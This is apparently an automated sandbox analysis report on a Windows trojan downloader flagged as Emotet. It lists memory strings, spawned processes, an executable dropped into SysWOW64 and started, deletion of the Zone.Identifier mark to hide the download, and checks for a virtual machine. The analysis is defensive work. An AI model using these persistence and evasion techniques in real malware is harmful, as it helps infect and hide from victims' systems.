          Source: svchost.exe, 00000005.00000003.306133734.000001ED2A861000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000005.00000003.284300397.000001ED2A831000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000018.00000003.479078515.000001C21DF5C000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479027196.000001C21DFBE000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.479101603.000001C21DF46000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
          Source: svchost.exe, 00000018.00000003.472860631.000001C21DF46000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.472920325.000001C21DF69000.00000004.00000001.sdmpString found in binary or memory: https://picsart.com/privacy-policy?hl=en
          Source: svchost.exe, 00000005.00000002.306699521.000001ED2A83D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
          Source: svchost.exe, 00000005.00000002.306628960.000001ED2A813000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
          Source: svchost.exe, 00000005.00000003.284300397.000001ED2A831000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306203525.000001ED2A845000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306182596.000001ED2A840000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
          Source: svchost.exe, 00000005.00000003.306236297.000001ED2A83A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
          Source: svchost.exe, 00000005.00000002.306730175.000001ED2A84E000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
          Source: svchost.exe, 00000002.00000002.519669425.000001AA3DC15000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495678160.000001C21DF1F000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
          Source: svchost.exe, 00000018.00000003.477651130.000001C21DF7B000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.247958422.00000000007BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected EmotetShow sources
          Source: Yara matchFile source: 00000000.00000002.248081066.0000000000C41000.00000020.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.516683693.0000000000AA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.247934419.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.516869836.0000000000AB1000.00000020.00000001.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile created: C:\Windows\SysWOW64\tpmcompc\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile deleted: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe:Zone.IdentifierJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_006125650_2_00612565
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_006123F90_2_006123F9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00C42C260_2_00C42C26
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00C42ABA0_2_00C42ABA
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AA25651_2_00AA2565
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AA23F91_2_00AA23F9
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB2C261_2_00AB2C26
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB2ABA1_2_00AB2ABA
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.248793368.0000000002E00000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.248793368.0000000002E00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.247928795.00000000005F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMFC42.DLL.MUIR vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.248665903.0000000002D00000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe, 00000000.00000002.247799112.000000000040E000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeBinary or memory string: OriginalFilenameTabDrives.EXEL vs SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe
          Source: classification engineClassification label: mal68.troj.evad.winEXE@16/5@0/2
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB35D2 Process32NextW,CreateToolhelp32Snapshot,FindCloseChangeNotification,1_2_00AB35D2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_004039E0 ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,LoadLibraryExA,LoadLibraryExA,?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z,SizeofResource,LoadLibraryExA,atoi,atoi,atoi,GetCurrentProcess,VirtualAllocExNuma,#825,#825,0_2_004039E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6336:120:WilError_01
          Source: SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
          Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
          Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeProcess created: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeJump to behavior
          Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenableJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00408070 push eax; ret 0_2_0040809E
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00408070 push eax; ret 1_2_0040809E

          Persistence and Installation Behavior:

          barindex
          Drops executables to the windows directory (C:\Windows) and starts themShow sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeExecutable created and started: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exePE file moved: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeJump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile opened: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exe:Zone.Identifier read attributes | deleteJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 5584Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6060Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00405DE0 FindFirstFileA,CloseHandle,0_2_00405DE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,0_2_004051E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,0_2_00406240
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,0_2_00405F40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00C428BC FindNextFileW,FindFirstFileW,FindClose,0_2_00C428BC
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00405DE0 FindFirstFileA,CloseHandle,1_2_00405DE0
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_004051E0 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#800,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#800,#800,1_2_004051E0
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00406240 _mbscmp,#535,_mbscmp,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,FindNextFileA,#537,_mbscmp,_mbscmp,#800,FindNextFileA,FindClose,#800,1_2_00406240
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00405F40 #535,#5710,_mbscmp,_mbscmp,#800,#941,#941,FindFirstFileA,#800,#1168,#1669,SendMessageA,#537,_mbscmp,_mbscmp,#4000,#535,#5710,_mbscmp,#800,#941,#941,#800,#800,FindNextFileA,FindClose,#1168,#2652,#800,1_2_00405F40
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeCode function: 1_2_00AB28BC FindNextFileW,FindFirstFileW,FindClose,1_2_00AB28BC
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: svchost.exe, 00000002.00000002.519752062.000001AA3DC62000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
          Source: KBDGAE.exe, 00000001.00000002.519880120.00000000028C8000.00000004.00000001.sdmp, svchost.exe, 00000002.00000002.519740101.000001AA3DC56000.00000004.00000001.sdmp, svchost.exe, 00000018.00000002.495528806.000001C21D6E7000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: svchost.exe, 00000004.00000002.515292885.000001E2AE42A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: svchost.exe, 00000008.00000002.302356540.0000011C44F40000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.363799652.000001E337260000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.443570729.00000268FD140000.00000002.00000001.sdmp, svchost.exe, 00000016.00000002.460658141.0000013D1D340000.00000002.00000001.sdmp, svchost.exe, 00000018.00000002.496150156.000001C21E600000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Windows\SysWOW64\tpmcompc\KBDGAE.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00610467 mov eax, dword ptr fs:[00000030h]0_2_00610467
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00613022 mov eax, dword ptr fs:[00000030h]0_2_00613022
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_0061273F mov eax, dword ptr fs:[00000030h]0_2_0061273F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00C436E3 mov eax, dword ptr fs:[00000030h]0_2_00C436E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14035.3447.exeCode function: 0_2_00C42E00 mov eax, dword ptr fs:[00000030h]0_2_00C42E00
